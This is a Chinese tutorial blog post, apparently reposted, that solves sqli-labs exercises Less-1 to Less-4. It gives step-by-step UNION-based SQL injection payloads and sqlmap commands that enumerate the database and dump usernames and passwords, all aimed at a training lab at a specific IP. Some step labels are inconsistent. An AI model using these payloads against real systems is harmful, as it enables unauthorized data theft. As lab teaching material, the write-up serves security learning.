2-手工sql注入(进阶篇) sqlilabs靶场1-4题

1. 阅读,学习本章前,可以先去看看基础篇:1-手工sql注入(基础篇)-CSDN博客

2. 本章通过对sqlilabs靶场的实战,关于sqlilabs靶场的搭建:Linux搭建靶场-CSDN博客

3. 本章会使用到sqlmap,关于sqlmap的命令:sql注入工具-​sqlmap-CSDN博客

点击访问题目:

通过 url 参数访问题目:http://服务器地址/sqlilabs/Less-1/

  • Less-1 是第一题题目
  • Less-2 是第二题题目 
  • 以此类推,进行访问

判断注入类型:在SQL注入中,判断是字符型注入还是数字型注入可以通过以下方法:

  • 1. 观察注入点的上下文:在注入点前后的SQL语句中,如果注入点处的参数被引号包围(例如:'1'),则很可能是字符型注入;如果不被引号包围(例如:1),则可能是数字型注入。
  • 2. 字符串函数的使用:在注入点处,如果使用了字符串函数(如CONCAT、SUBSTRING、LENGTH等),则很可能是字符型注入。这是因为字符串函数通常用于修改字符串值,而数字类型的参数并不需要使用字符串函数。
  • 3. 错误消息:如果在注入点处注入了非法字符或非法语法,且数据库返回了错误消息,可以通过错误消息中的内容来判断是字符型注入还是数字型注入。例如,如果错误消息中包含了关于字符串数据类型的错误信息(如字符串转换错误),则可能是字符型注入。
  • 4. 注入点的响应:在注入点处注入不同类型的数据,观察数据库的响应。如果注入点返回了期望的结果(如查询结果集),则可能是字符型注入;如果注入点返回了错误信息或者无效的结果,可能是数字型注入。

Less-1

第一题的题目Less-1需要通过给url传递 id 参数访问数据:也就是我们的注入点

  • 例如:http:///sqlilabs/Less-1/?id=1 访问(查询)数据库中id为1的数据
  • 分析:
    • 请求方式:get请求
    • 请求参数:id
  • 返回内容:根据id查询出来的用户信息
  • 模拟场景:后端查询用户数据

注入点:http://38.147.186.138/sqlilabs/Less-1/?id=1

手工注入

第一步:判断注入点 是否存在注入

已知:

  • 注入点为:http://38.147.186.138/sqlilabs/Less-1/?id=1

测试是否存在注入:

  1. 数字型注入测试:
    • 输入:http://38.147.186.138/sqlilabs/Less-1/?id=1 and 1=1 #      正常返回数据
    • 输入:http://38.147.186.138/sqlilabs/Less-1/?id=1 and 1=2 #      正常返回数据
  2. 字符型注入-单引号闭合测试:'
    • 输入:http://38.147.186.138/sqlilabs/Less-1/?id=1' and 1=1 #      不正常返回数据,页面报错,可能存在注入点,报错中可以看到数字1,推断出是字符型注入

结果:

  • http://38.147.186.138/sqlilabs/Less-1/?id=1 结果存在注入
  • 注入类型为字符型:1' and 1=1

第二步: 获取字段数

已知:

  • 注入点为:http://38.147.186.138/sqlilabs/Less-1/?id=1
  • 注入类型为:字符型注入,闭合字符为单引号 '

获取字段数:

  1. 输入:http://38.147.186.138/sqlilabs/Less-1/?id=1' order by 1 #   报错
  2. 输入:http://38.147.186.138/sqlilabs/Less-1/?id=1' order by 1 -- +   字段数为1,显示正常
  3. 输入:http://38.147.186.138/sqlilabs/Less-1/?id=1' order by 2 -- +   字段数为2,显示正常
  4. 输入:http://38.147.186.138/sqlilabs/Less-1/?id=1' order by 3 -- +   字段数为3,显示正常
  5. 输入:http://38.147.186.138/sqlilabs/Less-1/?id=1' order by 4 -- +   字段数为4,显示: Unknown column '4' in 'order clause' ,通过这个报错可以知道 字段的长度为3,因为为4,报错,表示没有这个字段数,也可以理解为超过字段长度
  6. 问题:为什么使用 # 注释符报错,而使用 -- 注释符不报错
    1. 当sql注入时使用 order by # 时,它是将 # 后面的内容作为注释,因此后面的语句被忽略,可能会导致语法错误或意外结果
    2. 当sql注入时使用 order by -- + 是单行注释的开始,并注释掉了 -- + 后面的内容,这样做的目的是注释掉 sql 语句中可能造成错误的部分,而不会导致整个语句被忽略
    3. 总的来说,-- + 注释符号在 sql 注入中使用更为广泛,因为它可以注释掉部分语句而不会导致整个语句被忽略。也可以 在使用 # 报错后 使用 -- + ,因为具体使用哪种注释符号还要根据具体的注入场景和数据库的不同而定
    4. 但是建议还是使用 -- + 

结果:

  • 字段数长度为:3

第三步: 确定回显位

已知:

  • 注入点为:http://38.147.186.138/sqlilabs/Less-1/?id=1
  • 注入类型为:字符型注入,闭合字符为单引号 '
  • 字段数为:3

确定回显位:

  1. 输入:http://38.147.186.138/sqlilabs/Less-1/?id=1' union select 1,2,3 -- + 未显示回显位,显示查询的数据
  2. 输入:http://38.147.186.138/sqlilabs/Less-1/?id=2' union select 1,2,3 -- + 未显示回显位,显示查询的数据
  3. 输入:http://38.147.186.138/sqlilabs/Less-1/?id=-1' union select 1,2,3 -- + 显示回显位,回显位就是看看表格里面那一列是在页面显示的。可以看到是第二列和第三列里面的数据显存位的数据2和3
  4. 问题:关于为什么 id=2' union select 1,2,3 -- +和?id=2' union select 1,2,3 -- + 返回是正常的数据而不是 回显的数据
    1. 因为 id=2' 数据库中存在2的数据查询出来2的数据显示到网页中,然后才查询 union select 1,2,3 -- +
    2. 解决:可以设置 id=-1'  或将 id值设置为一个没有结果的值,例如 id=1000',因为 数据库中没有id=1000的数据,所以这时候就是 2,3进行占位

结果:

  • 回显位置为:网页的第二列和第三列

第四步:获取当前数据库库名

已知:

  • 注入点为:http://38.147.186.138/sqlilabs/Less-1/?id=1
  • 注入类型为:字符型注入,闭合字符为单引号 '
  • 字段数为:3
  • 回显位置为:网页的第二列和第三列

  • 使用myqsl中的database()函数获取数据库名称
  • 输入:http://38.147.186.138/sqlilabs/Less-1/?id=-1' union select 1,database(),3 -- +

结果:

  • 数据库名称为:security

第五步:获取数据库所有表名

已知:

  • 注入点为:http://38.147.186.138/sqlilabs/Less-1/?id=1
  • 注入类型为:字符型注入,闭合字符为单引号 '
  • 字段数为:3
  • 回显位置为:网页的第二列和第三列
  • 数据库名称为:security

获取数据库表名:

  • 获取数据库所有表名:http://38.147.186.138/sqlilabs/Less-1/?id=-1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema='security' --+
  • sql语句解读:从`information_schema.tables`表中获取所有属于`security`数据库的表名,并将它们以逗号分隔的形式返回。
    • group_concat() 是一个聚合函数,它用于将多个行的值连接到一个字符串中。它将多个值连接在一起,并且可以选择添加分隔符。
    • information_schema.tables 是一个默认的数据库,用于存储数据库中所有表的元数据。它包含了数据库中所有表的名称、类型、所属数据库、创建时间等信息。通过查询 information_schema.tables,可以获取数据库中表的相关信息,例如表名称、列数、索引数等。

结果:

  • 数据库security中的数据表为:emails,referers,usagents,users
  • users中存储这用户的信息,所以这是主要的获取数据的目标表

第六步:获取数据表列名

已知:

  • 注入点为:http://38.147.186.138/sqlilabs/Less-1/?id=1
  • 注入类型为:字符型注入,闭合字符为单引号 '
  • 字段数为:3
  • 回显位置为:网页的第二列和第三列
  • 数据库名称为:security
  • 数据库security中的数据表为:emails,referers,usagents,users
    • users中存储这用户的信息,所以这是主要的获取数据的目标表

获取数据表列名:

  • 输入:http://38.147.186.138/sqlilabs/Less-1/?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

结果:

  • 通过上图中获取到的数据表列名可以确定 username和password为主要用户数据的列名

第六步:获取数据

已知:

  • 注入点为:http://38.147.186.138/sqlilabs/Less-1/?id=1
  • 注入类型为:字符型注入,闭合字符为单引号 '
  • 字段数为:3
  • 回显位置为:网页的第二列和第三列
  • 数据库名称为:security
  • 数据库security中的数据表为:emails,referers,usagents,users
    • users中存储这用户的信息,所以这是主要的获取数据的目标表
  • users数据库列名:username和password

获取数据:

  • 输入:http://38.147.186.138/sqlilabs/Less-1/?id=-1' union select 1,2,group_concat(username,password) from users -- +
 

Less-1  手工注入结束
 

 

 

sqlmap注入
 

  1. 检测注入点:python sqlmap.py -u "http://38.147.186.138/sqlilabs/Less-1/?id=1" --batch
  2. 获取所有数据库:python sqlmap.py -u "http://38.147.186.138/sqlilabs/Less-1/?id=1" --dbs  --batch
  3. 获取当前使用的数据库: python sqlmap.py -u "http://38.147.186.138/sqlilabs/Less-1/?id=1" --current-db --batch
  4. 获取security数据表:python sqlmap.py -u "http://38.147.186.138/sqlilabs/Less-1/?id=1" -D "security" --tables --batch
  5. 获取users表中的字段:python sqlmap.py -u "http://38.147.186.138/sqlilabs/Less-1/?id=1" -D "security" -T "users" --columns --batch
  6. 获取数据:python sqlmap.py -u "http://38.147.186.138/sqlilabs/Less-1/?id=1" -D "security" -T "users" -C "username,password" --dump  --batch
 

 

Less-1  sqlmap工具注入结束
 

 

 

 

 

 

Less-2 
 

第二题的题目Less-2需要通过给url传递 id 参数访问数据:也就是我们的注入点
 

  • 例如:http:///sqlilabs/Less-1/?id=1 访问(查询)数据库中id为1的数据
  • 分析: 
    • 请求方式:get请求
    • 请求参数:id
  • 返回内容:根据id查询出来的用户信息
  • 模拟场景:后端查询用户数据
 

 

注入点:http://38.147.186.138/sqlilabs/Less-1/?id=1' and 1=1
 

 

手工注入
 

1. 判断注入类型
 

已知:
 

  • 注入点为:http://38.147.186.138/sqlilabs/Less-2/?id=1
 

判断注入类型:
 

  • 数字型注入测试: 
    • 输入:http://38.147.186.138/sqlilabs/Less-2/?id=1 and 1=1 #      正常返回数据
    • 输入:http://38.147.186.138/sqlilabs/Less-2/?id=1 and 1=2 #      正常返回数据
  • 字符型注入-单引号闭合测试:' 
    • 输入:http://38.147.186.138/sqlilabs/Less-2/?id=1' and 1=1 #      不正常返回数据,页面报错,可能存在注入点,不被引号包围(例如:1),则可能是数字型注入
 

结果:
 

  • http://38.147.186.138/sqlilabs/Less-2/?id=1 结果存在注入
  • 注入类型为数字型注入:1' 
 

 

第二步: 获取字段数
 

已知:
 

  • 注入点为:http://38.147.186.138/sqlilabs/Less-2/?id=1
  • 注入类型为:数字型注入
 

 

获取字段数:
 

  • 输入:http://38.147.186.138/sqlilabs/Less-2/?id=1 order by 1 -- +   字段数为1,显示正常
  • 输入:http://38.147.186.138/sqlilabs/Less-2/?id=1 order by 2 -- +   字段数为2,显示正常
  • 输入:http://38.147.186.138/sqlilabs/Less-2/?id=1 order by 3 -- +   字段数为3,显示正常
  • 输入:http://38.147.186.138/sqlilabs/Less-2/?id=1 order by 4 -- +   字段数为4,字段数为4,显示: Unknown column '4' in 'order clause' ,通过这个报错可以知道 字段的长度为3,因为为4,报错,表示没有这个字段数,也可以理解为超过字段长度
 

结果:
 

  • 字段数长度为:3
 

 

第三步: 确定回显位
 

已知:
 

  • 注入点为:http://38.147.186.138/sqlilabs/Less-2/?id=1
  • 注入类型为:字符型注入,闭合字符为单引号 '
  • 字段数为:3
 

确定回显位:
 

  • 输入:http://38.147.186.138/sqlilabs/Less-2/?id=100 union select 1,2,3 --+ 显示回显位,回显位就是看看表格里面那一列是在页面显示的。可以看到是第二列和第三列里面的数据显存位的数据2和3
 

结果:
 

  • 回显位置为:网页的第二列和第三列
 

 

第四步:获取当前数据库库名
 

已知:
 

  • 注入点为:http://38.147.186.138/sqlilabs/Less-2/?id=1
  • 注入类型为:字符型注入,闭合字符为单引号 '
  • 字段数为:3
  • 回显位置为:网页的第二列和第三列
 

 

获取当前数据库库名:
 

  • 使用myqsl中的database()函数获取数据库名称
  • 输入:http://38.147.186.138/sqlilabs/Less-2/?id=100 union select 1,database(),3 --+
 

结果:
 

  • 数据库名称为:security
 

 

第五步:获取数据库所有表名
 

已知:
 

  • 注入点为:http://38.147.186.138/sqlilabs/Less-2/?id=1
  • 注入类型为:字符型注入,闭合字符为单引号 '
  • 字段数为:3
  • 回显位置为:网页的第二列和第三列
  • 数据库名称为:security
 

 

获取数据库表名:
 

  • 获取数据库所有表名:http://38.147.186.138/sqlilabs/Less-2/?id=-100 union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema='security' --+
 

结果:
 

  • 数据库security中的数据表为:emails,referers,usagents,users
  • users中存储这用户的信息,所以这是主要的获取数据的目标表
 

 

第六步:获取数据表列名
 

已知:
 

  • 注入点为:http://38.147.186.138/sqlilabs/Less-2/?id=1
  • 注入类型为:字符型注入,闭合字符为单引号 '
  • 字段数为:3
  • 回显位置为:网页的第二列和第三列
  • 数据库名称为:security
  • 数据库security中的数据表为:emails,referers,usagents,users
  • users中存储这用户的信息,所以这是主要的获取数据的目标表
 

获取数据表列名:
 

  • 输入:http://38.147.186.138/sqlilabs/Less-2/?id=100 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
 

结果:
 

  • 通过上图中获取到的数据表列名可以确定 username和password为主要用户数据的列名
 

 

第六步:获取数据
 

已知:
 

  • 注入点为:http://38.147.186.138/sqlilabs/Less-2/?id=1
  • 注入类型为:字符型注入,闭合字符为单引号 '
  • 字段数为:3
  • 回显位置为:网页的第二列和第三列
  • 数据库名称为:security
  • 数据库security中的数据表为:emails,referers,usagents,users
  • users中存储这用户的信息,所以这是主要的获取数据的目标表
  • users数据库列名:username和password
 

获取数据:
 

  • 输入:http://38.147.186.138/sqlilabs/Less-2/?id=100 union select 1,2,group_concat(username,password) from users --+
 

Less-1  手工注入结束
 

 

 

Less-3
 

第三题的题目Less-3需要通过给url传递 id 参数访问数据:也就是我们的注入点
 

  • 例如:http:///sqlilabs/Less-3/?id=1 访问(查询)数据库中id为1的数据
  • 分析: 
    • 请求方式:get请求
    • 请求参数:id
  • 返回内容:根据id查询出来的用户信息
  • 模拟场景:后端查询用户数据
 

 

注入点:http://38.147.186.138/sqlilabs/Less-2/?id=1' and 1=1
 

 

手工注入
 

1. 判断注入类型
 

已知:
 

  • 注入点为:http://38.147.186.138/sqlilabs/Less-2/?id=1
 

 

判断注入类型:
 

  • 数字型注入测试: 
    • 输入:http://38.147.186.138/sqlilabs/Less-3/?id=1 and 1=1 #      正常返回数据
    • 输入:http://38.147.186.138/sqlilabs/Less-3/?id=1 and 1=2 #      正常返回数据
  • 字符型注入测试: 
    • http://38.147.186.138/sqlilabs/Less-3/?id=1' and 1=2 #   不正常返回数据,页面报错,可能存在注入点,1 被引号包围 "1"  说明是一个字符型注入,报错中还有一个 ) 号,可以推断这是一个 单引号加右括号的闭合方式:')  
 

结果:
 

  • http://38.147.186.138/sqlilabs/Less-3/?id=1')  结果存在注入
  • 注入类型为字符型注入:1') 闭合方式为 ')
 

 

第二步: 获取字段数
 

已知:
 

  • 注入点为:http://38.147.186.138/sqlilabs/Less-3/?id=1
  • http://38.147.186.138/sqlilabs/Less-3/?id=1')  结果存在注入
  • 注入类型为字符型注入:1') 闭合方式为 ')
 

获取字段数:
 

  • 输入:http://38.147.186.138/sqlilabs/Less-3/?id=1') order by 1 -- +   字段数为1,显示正常
  • 输入:http://38.147.186.138/sqlilabs/Less-3/?id=1') order by 2 -- +   字段数为2,显示正常
  • 输入:http://38.147.186.138/sqlilabs/Less-3/?id=1') order by 3 -- +   字段数为3,显示正常
  •  
    输入:http://38.147.186.138/sqlilabs/Less-3/?id=1') order by 4 -- +   字段数为4,显示: Unknown column '4' in 'order clause' ,通过这个报错可以知道 字段的长度为3,因为为4,报错,表示没有这个字段数,也可以理解为超过字段长度
     
 

结果:
 

  • 字段数长度为:3
 

 

第三步: 确定回显位
 

已知:
 

  • 注入点为:http://38.147.186.138/sqlilabs/Less-3/?id=1
  • http://38.147.186.138/sqlilabs/Less-3/?id=1')  结果存在注入
  • 注入类型为字符型注入:1') 闭合方式为 ')
  • 字段数长度为:3
 

确定回显位:
 

  • 输入:http://38.147.186.138/sqlilabs/Less-3/?id=100') union select 1,2,3 --+ 显示回显位,回显位就是看看表格里面那一列是在页面显示的。可以看到是第二列和第三列里面的数据显存位的数据2和3
 

结果:
 

  • 回显位置为:网页的第二列和第三列
 

 

第四步:获取当前数据库库名
 

已知:
 

  • 注入点为:http://38.147.186.138/sqlilabs/Less-3/?id=1
  • http://38.147.186.138/sqlilabs/Less-3/?id=1')  结果存在注入
  • 注入类型为字符型注入:1') 闭合方式为 ')
  • 字段数长度为:3
  • 回显位置为:网页的第二列和第三列
 

获取当前数据库库名:
 

  • 使用myqsl中的database()函数获取数据库名称
  • 输入:http://38.147.186.138/sqlilabs/Less-3/?id=100') union select 1,database(),3 --+
 

结果:
 

  • 数据库名称为:security
 

 

第五步:获取数据库所有表名
 

已知:
 

  • 注入点为:http://38.147.186.138/sqlilabs/Less-3/?id=1
  • http://38.147.186.138/sqlilabs/Less-3/?id=1')  结果存在注入
  • 注入类型为字符型注入:1') 闭合方式为 ')
  • 字段数长度为:3
  • 回显位置为:网页的第二列和第三列
  • 数据库名称:security
 

获取数据库所有表名:    http://38.147.186.138/sqlilabs/Less-3/?id=100') union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema='security' --+
 

结果:
 

  • 数据库security中的数据表为:emails,referers,usagents,users
  • users中存储这用户的信息,所以这是主要的获取数据的目标表
 

 

第六步:获取数据表列名
 

已知:
 

  • 注入点为:http://38.147.186.138/sqlilabs/Less-3/?id=1
  • http://38.147.186.138/sqlilabs/Less-3/?id=1')  结果存在注入
  • 注入类型为字符型注入:1') 闭合方式为 ')
  • 字段数长度为:3
  • 回显位置为:网页的第二列和第三列
  • 数据库名称:security
  • 数据库security中的数据表为:emails,referers,usagents,users
  • users中存储这用户的信息,所以这是主要的获取数据的目标表
 

获取数据表列名:
 

  • 输入:http://38.147.186.138/sqlilabs/Less-3/?id=100') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
 

​​​​​结果:
 

  • 通过上图中获取到的数据表列名可以确定 username和password为主要用户数据的列名
 

 

第六步:获取数据
 

已知:
 

  • 注入点为:http://38.147.186.138/sqlilabs/Less-3/?id=1
  • http://38.147.186.138/sqlilabs/Less-3/?id=1')  结果存在注入
  • 注入类型为字符型注入:1') 闭合方式为 ')
  • 字段数长度为:3
  • 回显位置为:网页的第二列和第三列
  • 数据库名称:security
  • 数据库security中的数据表为:emails,referers,usagents,users
  • users中存储这用户的信息,所以这是主要的获取数据的目标表
  • users数据库列名:username和password
 

获取数据:
 

  • 输入:http://38.147.186.138/sqlilabs/Less-3/?id=100') union select 1,2,group_concat(username,password) from users --+
 

 

Less-4
 

第四题的题目Less-4需要通过给url传递 id 参数访问数据:也就是我们的注入点
 

  • 例如:http:///sqlilabs/Less-4/?id=1 访问(查询)数据库中id为1的数据
  • 分析: 
    • 请求方式:get请求
    • 请求参数:id
  • 返回内容:根据id查询出来的用户信息
  • 模拟场景:后端查询用户数据
 

 

注入点:http://38.147.186.138/sqlilabs/Less-4/?id=1' and 1=1
 

 

 

手工注入
 

1. 判断注入类型
 

已知:
 

  • 注入点为:http://38.147.186.138/sqlilabs/Less-4/?id=1
 

判断注入类型:
 

  • 数字型注入测试: 
    • 输入:http://38.147.186.138/sqlilabs/Less-4/?id=1 and 1=1 #      正常返回数据
    • 输入:http://38.147.186.138/sqlilabs/Less-4/?id=1 and 1=2 #      正常返回数据
  • 字符型测试-单引号闭合:' 
    • 输入:http://38.147.186.138/sqlilabs/Less-4/?id=1' 正常返回数据
  • 字符型测试-单引号闭合+括号:') 
    • 输入:http://38.147.186.138/sqlilabs/Less-4/?id=1') 正常返回数据
  • 字符型测试-双引号闭合:" 
    • ​​​​​​​​​​​​​​输入:http://38.147.186.138/sqlilabs/Less-4/?id=1" 不正常返回数据,页面报错,可能存在注入点,1 被引号包围 "1"  说明是一个字符型注入,报错中还有一个 ) 号,可以推断这是一个 双引号加右括号的闭合方式:")  
 

结果:
 

  • http://38.147.186.138/sqlilabs/Less-4/?id=1"  结果存在注入
  • 注入类型为字符型注入:1") 闭合方式为 ")
 

 

第二步: 获取字段数
 

已知:
 

  • 注入点为:http://38.147.186.138/sqlilabs/Less-4/?id=1
  • http://38.147.186.138/sqlilabs/Less-4/?id=1"  结果存在注入
  • 注入类型为字符型注入:1") 闭合方式为 ")
 

获取字段数:
 

  • 输入:http://38.147.186.138/sqlilabs/Less-4/?id=1") order by 1 -- +   字段数为1,显示正常
  • 输入:http://38.147.186.138/sqlilabs/Less-4/?id=1") order by 2 -- +   字段数为2,显示正常
  • 输入:http://38.147.186.138/sqlilabs/Less-4/?id=1") order by 3 -- +   字段数为3,显示正常
  • 输入:http://38.147.186.138/sqlilabs/Less-4/?id=1") order by 4 -- +   字段数为4,显示: Unknown column '4' in 'order clause' ,通过这个报错可以知道 字段的长度为3,因为为4,报错,表示没有这个字段数,也可以理解为超过字段长度
 

结果:
 

  • 字段数长度为:3
 

 

第三步: 确定回显位
 

已知:
 

  • 注入点为:http://38.147.186.138/sqlilabs/Less-4/?id=1
  • http://38.147.186.138/sqlilabs/Less-4/?id=1"  结果存在注入
  • 注入类型为字符型注入:1") 闭合方式为 ")
  • 字段数长度为:3
 

确定回显位:
 

  • 输入:http://38.147.186.138/sqlilabs/Less-4/?id=100") union select 1,2,3 --+ 显示回显位,回显位就是看看表格里面那一列是在页面显示的。可以看到是第二列和第三列里面的数据显存位的数据2和3
 

结果:
 

  • 回显位置为:网页的第二列和第三列
 

 

第四步:获取当前数据库库名
 

已知:
 

  • 注入点为:http://38.147.186.138/sqlilabs/Less-4/?id=1
  • http://38.147.186.138/sqlilabs/Less-4/?id=1"  结果存在注入
  • 注入类型为字符型注入:1") 闭合方式为 ")
  • 字段数长度为:3
  • 回显位置为:网页的第二列和第三列
 

获取当前数据库库名:
 

  • 使用myqsl中的database()函数获取数据库名称
  • 输入:http://38.147.186.138/sqlilabs/Less-4/?id=100") union select 1,database(),3 --+
 

结果:
 

  • 数据库名称为:security
 

 

第五步:获取数据库所有表名
 

 

已知:
 

  • 注入点为:http://38.147.186.138/sqlilabs/Less-4/?id=1
  • http://38.147.186.138/sqlilabs/Less-4/?id=1"  结果存在注入
  • 注入类型为字符型注入:1") 闭合方式为 ")
  • 字段数长度为:3
  • 回显位置为:网页的第二列和第三列
  • 数据库名称为:security
 

获取数据库所有表名:    http://38.147.186.138/sqlilabs/Less-4/?id=100") union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema='security' --+
 

结果:
 

  • 数据库security中的数据表为:emails,referers,usagents,users
  • users中存储这用户的信息,所以这是主要的获取数据的目标表
 

 

已知:
 

  • 注入点为:http://38.147.186.138/sqlilabs/Less-4/?id=1
  • http://38.147.186.138/sqlilabs/Less-4/?id=1"  结果存在注入
  • 注入类型为字符型注入:1") 闭合方式为 ")
  • 字段数长度为:3
  • 回显位置为:网页的第二列和第三列
  • 数据库名称为:security
  • 数据库security中的数据表为:emails,referers,usagents,users
  • users中存储这用户的信息,所以这是主要的获取数据的目标表
 

获取数据表列名:
 

  • 输入:http://38.147.186.138/sqlilabs/Less-4/?id=100") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
 

结果:
 

  • 通过上图中获取到的数据表列名可以确定 username和password为主要用户数据的列名
 

 

第六步:获取数据
 

已知:
 

  • 注入点为:http://38.147.186.138/sqlilabs/Less-4/?id=1
  • http://38.147.186.138/sqlilabs/Less-4/?id=1"  结果存在注入
  • 注入类型为字符型注入:1") 闭合方式为 ")
  • 字段数长度为:3
  • 回显位置为:网页的第二列和第三列
  • 数据库名称为:security
  • 数据库security中的数据表为:emails,referers,usagents,users
  • users中存储这用户的信息,所以这是主要的获取数据的目标表
  • 通过上图中获取到的数据表列名可以确定 username和password为主要用户数据的列名
 

获取数据:
 

  • 输入:http://38.147.186.138/sqlilabs/Less-4/?id=100") union select 1,2,group_concat(username,password) from users --+
 

 

 

 












本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/pingmian/5994.shtml


如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!











相关文章










机器翻译常用指标BLEU








机器翻译常用指标BLEU




诸神缄默不语-个人CSDN博文目录 文章目录 什么是BLEU指标?BLEU指标的原理BLEU的计算公式BLEU指标的Python实现 什么是BLEU指标? 
BLEU(Bilingual Evaluation Understudy)指标是一种评估机器翻译质量的方法,广泛用于自然…




阅读更多...

















salesforce vscode 获取profile metadata所有配置内容








salesforce vscode 获取profile metadata所有配置内容




1.更新cli:sfdx update 
2.安装read插件:sfdx plugins:install sfdx-plugin-source-read 
3.通过vscode☁️(org browser)或者package.xml拉取profile,此时获取的简档没有所有配置内容 
<?xml version"1.0&qu…




阅读更多...

















PostgreSQL自带的命令行工具02- createdb








PostgreSQL自带的命令行工具02- createdb




PostgreSQL自带的命令行工具02- createdb 
基础信息
OS版本&#xff1a;Red Hat Enterprise Linux Server release 7.9 (Maipo)
DB版本&#xff1a;16.2
pg软件目录&#xff1a;/home/pg16/soft
pg数据目录&#xff1a;/home/pg16/data
端口&#xff1a;5777createdb 是 Postgr…




阅读更多...

















2024五一数学建模C题煤矿深部开采冲击地压危险预测原创论文分享








2024五一数学建模C题煤矿深部开采冲击地压危险预测原创论文分享




大家好&#xff0c;从昨天肝到现在&#xff0c;终于完成了2024五一数学建模竞赛C题的完整论文啦。 实在精力有限&#xff0c;具体的讲解大家可以去讲解视频&#xff1a; 
2024五一数学建模C题完整原创论文讲解&#xff0c;手把手保姆级教学&#xff01;_哔哩哔哩_bilibili 
202…




阅读更多...

















003 redis分布式锁 jedis分布式锁 Redisson分布式锁 分段锁








003 redis分布式锁 jedis分布式锁 Redisson分布式锁 分段锁




文章目录 Redis分布式锁原理1.使用set的命令时&#xff0c;同时设置过期时间2.使用lua脚本&#xff0c;将加锁的命令放在lua脚本中原子性的执行 Jedis分布式锁实现pom.xmlRedisCommandLock.javaRedisCommandLockTest.java 锁过期问题1乐观锁方式&#xff0c;增加版本号(增加版本…




阅读更多...

















自动控制工程技术人员的工作内容有哪些








自动控制工程技术人员的工作内容有哪些




自动控制工程技术人员主要负责开发和维护自动化系统和控制仪器&#xff0c;他们的工作内容涵盖了从系统设计、实施到测试和优化各个方面。以LabVIEW&#xff08;一种广泛使用的图形编程语言&#xff0c;用于数据采集、仪器控制和工业自动化&#xff09;为例&#xff0c;自动控制…




阅读更多...

















npm一篇通








npm一篇通




npm 是什么&#xff1f; 
npm&#xff0c;全称Node Package Manager&#xff0c;是随Node.js一起分发的开源包管理系统&#xff0c;也是JavaScript生态中最流行的依赖管理工具。npm可以用于安装、管理和发布JavaScript模块。 
对于Java后端开发人员来说&#xff0c;可以将其等同…




阅读更多...

















Python面试十问








Python面试十问




一、深浅拷贝的区别&#xff1f; 
浅拷⻉&#xff1a; 拷⻉的是对象的引⽤&#xff0c;如果原对象改变&#xff0c;相应的拷⻉对象也会发⽣改变。 
深拷⻉&#xff1a; 拷⻉对象中的每个元素&#xff0c;拷⻉对象和原有对象不在有关系&#xff0c;两个是独⽴的对象。 
浅拷⻉(c…




阅读更多...

















python和R对比记忆








python和R对比记忆




PythonRMySQL数据类型 整型int 浮点型float 字符串str 布尔型bool 【特殊】None类型和复数类型 【用户自定义】类和对象   数值型 字符型 逻辑型 因子型factor[针对定性数据] 【特殊】时间序列类型time series、日期类型date、日期时间类型datetime 【用户自定义】S3对象、S4对…




阅读更多...

















探索高级聚类技术:使用LLM进行客户细分








探索高级聚类技术:使用LLM进行客户细分




在数据科学领域&#xff0c;客户细分是理解和分析客户群体的重要步骤。最近&#xff0c;我发现了一个名为“Clustering with LLM”的GitHub仓库&#xff0c;它由Damian Gil Gonzalez创建&#xff0c;专门针对这一领域提供了一些先进的聚类技术。在这篇文章中&#xff0c;我将概…




阅读更多...

















安卓手机APP开发__媒体开发部分__处理在声音输出中的变化








安卓手机APP开发__媒体开发部分__处理在声音输出中的变化




安卓手机APP开发__媒体开发部分__处理在声音输出中的变化 
目录 
概述 
使用音量控制 
程序化地控制流的音量 
在固定音量的设备上工作 
不要很大声的噪音 概述 
用户期望能够控制一个音频APP的音量大小。标准的行为包括 使用音量控制的能力&#xff08;在设备上的按钮或者是用…




阅读更多...

















Python 解读:如何使用 ceil 和 floor 函数进行数学运算








Python 解读:如何使用 ceil 和 floor 函数进行数学运算




在 Python 中&#xff0c;ceil 和 floor 函数是用于数学计算的两个非常重要的函数&#xff0c;它们分别表示对一个数执行向上取整和向下取整的操作。这两个函数位于 Python 的math模块中&#xff0c;因此在使用前需要先导入此模块。 
1. ceil函数 
ceil函数会将一个数向上舍入到…




阅读更多...

















python烟花代码








python烟花代码




在Python中&#xff0c;可以使用多种方式来模拟烟花效果&#xff0c;其中一种常见的方法是使用turtle图形库来绘制。以下是一个简单的示例&#xff0c;展示了如何使用turtle来创建一个烟花效果的动画&#xff1a; 
import turtle
import random# 设置屏幕和背景
screen  turtle…




阅读更多...

















【数据库主从架构】








【数据库主从架构】




【数据库主从架构】 1. 什么是数据库的主从架构1.1 主从复制1.1.1 MySQL的主从主从复制技术三级目录 1. 什么是数据库的主从架构 随着公司业务线的增多&#xff0c;各种数据都在迅速增加&#xff0c;并且数据的读取流量也大大增加&#xff0c;就面临着数据安全问题&#xff0c;…




阅读更多...

















Mac 电脑 vscode 终端提示 zsh: command not found








Mac 电脑 vscode 终端提示 zsh: command not found




问题 
Mac上装好node后&#xff0c;使用npm install安装依赖时&#xff0c;终端却提示zsh: command not found 
解决方案 
【1】在&#xff5e;目录下创建.zshrc文件; 【2】编辑source ~/.bash_profile至.zshrc文件中; 【3】source ~/.zshrc; 
cd ~
touch .zshrc
echo source ~…




阅读更多...

















06.Git远程仓库








06.Git远程仓库




Git远程仓库 
#仓库种类&#xff0c;举例说明
github
gitlab
gitee        #以这个仓库为例子操作登录码云 https://gitee.com/projects/new 创建仓库  
选择ssh方式  
需要配置ssh公钥  
在系统上获取公钥输入命令&#xff1a;ssh-keygen  
查看文件&#xff0c;复制公钥信息内…




阅读更多...

















【设计模式】16、state 状态模式








【设计模式】16、state 状态模式




文章目录 十六、state 状态模式16.1 自动购物机16.1.1 vending_machine_test.go16.1.2 vending_maching.go16.1.3 state.go16.1.4 no_good_state.go16.1.5 has_good_state.go 16.2 player16.2.1 player_test.go16.2.2 player.go16.2.3 state.go16.2.4 stopped_state.go16.2.5 p…




阅读更多...

















go的grpc的三种流模式通信








